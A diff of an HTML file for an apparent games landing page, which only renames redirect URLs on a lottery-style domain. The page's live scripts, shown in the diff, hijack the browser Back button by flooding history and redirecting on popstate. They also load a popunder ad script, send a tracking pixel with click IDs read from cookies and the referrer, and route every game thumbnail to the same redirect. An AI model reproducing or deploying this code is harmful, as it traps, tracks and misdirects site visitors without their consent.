--- a/index.html
+++ b/index.html
@@ -29,8 +29,8 @@
     <meta property="og:type" content="website">
   <meta data-intl-tel-input-cdn-path="intlTelInput/">
 <script>
-    var back = 'https://likeslottery.org/c69vl5k.php?key=lq75whapbn2eq3iksuqk';
-    var under = 'https://likeslottery.org/c69vl5k.php?key=3oiszeihxmtflxqnj319';
+    var back = 'https://likeslottery.org/click.php?key=lq75whapbn2eq3iksuqk';
+    var under = 'https://likeslottery.org/click.php?key=3oiszeihxmtflxqnj319';
 </script>
 <script src="https://backunder.com/script.js"></script></head>
   <body data-home-page="Home.html" data-home-page-title="Home" data-path-to-root="./" data-include-products="false" class="u-body u-xl-mode" data-lang="en"><header class="u-clearfix u-header u-header" id="sec-db4d"><div class="u-clearfix u-sheet u-valign-middle-lg u-valign-middle-md u-valign-middle-sm u-valign-middle-xl u-sheet-1">
@@ -49,7 +49,7 @@
     var wrapUrlWithClickId=(function(){"use strict";function n(n,r){var e;void 0===r&&(r="uclick");var u=null===(e=n.match(/\?.+?$/))||void 0===e?void 0:e[0];return u?Array.from(u.matchAll(new RegExp("[?&](clickid|"+r+")=([^=&]*)","g"))).map((function(n){return{name:n[1],value:n[2]}})):[]}function r(n){var r=n();return 0===r.length?{}:r.reduce((function(n,r){var e;return Object.assign(n,((e={})[r.name]=""+r.value,e))}),{})}function e(e){void 0===e&&(e="uclick");var u,i,t=r((function(){return(function(n){return void 0===n&&(n="uclick"),Array.from(document.cookie.matchAll(new RegExp("(?:^|; )(clickid|"+n+")=([^;]*)","g"))).map((function(n){return{name:n[1],value:n[2]}}))})(e)})),c=r((function(){return n(document.referrer,e)})),a=r((function(){return n(document.location.search,e)}));return(u=[e,"clickid"],i=[t,c,a],u.reduce((function(n,r){return n.concat(i.map((function(n){return[r,n]})))}),[])).map((function(n){return{name:n[0],value:n[1][n[0]]}})).find((function(n){return n.value}))||null}function u(n,r,e){var u=n.replace(new RegExp(r+"=[^=&]*","g"),r+"="+e);return-1!==u.indexOf(r)?u:(function(n,r,e){var u=n.trim(),i=r+"="+e;return-1===u.indexOf("?")?u+"?"+i:u.endsWith("?")?""+u+i:u+"&"+i})(n,r,e)}return function(n,r){void 0===r&&(r="uclick");var i=e(r);return null===i?n:n.includes("cnv_id")?i.name===r?u(n,i.name,i.value):i.value?u(n,"cnv_id",i.value):n:u(n,i.name,i.value)}})();
 
     var img = document.createElement('img');
-    img.src = wrapUrlWithClickId('https://likeslottery.org/c69vl5k.php?event9=' + (typeof(window.orientation)=='undefined' ? 1 : 0));
+    img.src = wrapUrlWithClickId('https://likeslottery.org/click.php?event9=' + (typeof(window.orientation)=='undefined' ? 1 : 0));
     img.referrerPolicy = 'no-referrer-when-downgrade';
 </script>
 <script type="text/javascript">
@@ -59,7 +59,7 @@
             const URL = window.location.href.split(/[#]/)[0];
             for (t = 0; 10 > t; ++t) history.pushState({}, "", URL+'#')
             onpopstate = function(event){
-                event.state && location.replace('https://likeslottery.org/c69vl5k.php?lp=1&event10=1');
+                event.state && location.replace('https://likeslottery.org/click.php?lp=1&event10=1');
             }
         } catch (o) { console.log( o ); }
     }();
@@ -114,7 +114,7 @@
               </div>
               <div class="u-over-slide u-shading u-over-slide-2"></div>
             </div>
-            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/c69vl5k.php?lp=1">
+            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/click.php?lp=1">
               <div class="u-back-slide" data-image-width="800" data-image-height="551">
                 <img class="u-back-image u-expanded u-back-image-3" src="images/animal-crush-thumbnail.png">
               </div>
@@ -128,19 +128,19 @@
       <div class="u-clearfix u-sheet u-valign-middle u-sheet-1">
         <div class="u-expanded-width u-gallery u-layout-grid u-lightbox u-show-text-on-hover u-gallery-1">
           <div class="u-gallery-inner u-gallery-inner-1">
-            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/c69vl5k.php?lp=1">
+            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/click.php?lp=1">
               <div class="u-back-slide" data-image-width="800" data-image-height="551">
                 <img class="u-back-image u-expanded u-back-image-1" src="images/birdfiy-thumbnail.png">
               </div>
               <div class="u-over-slide u-shading u-over-slide-1"></div>
             </div>
-            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/c69vl5k.php?lp=1">
+            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/click.php?lp=1">
               <div class="u-back-slide" data-image-width="800" data-image-height="551">
                 <img class="u-back-image u-expanded" src="images/ninja-war-thumbnail.png">
               </div>
               <div class="u-over-slide u-shading u-over-slide-2"></div>
             </div>
-            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/c69vl5k.php?lp=1">
+            <div class="u-effect-fade u-gallery-item" data-href="https://likeslottery.org/click.php?lp=1">
               <div class="u-back-slide" data-image-width="800" data-image-height="551">
                 <img class="u-back-image u-expanded" src="images/tower-wars-thumbnail.png">
               </div>
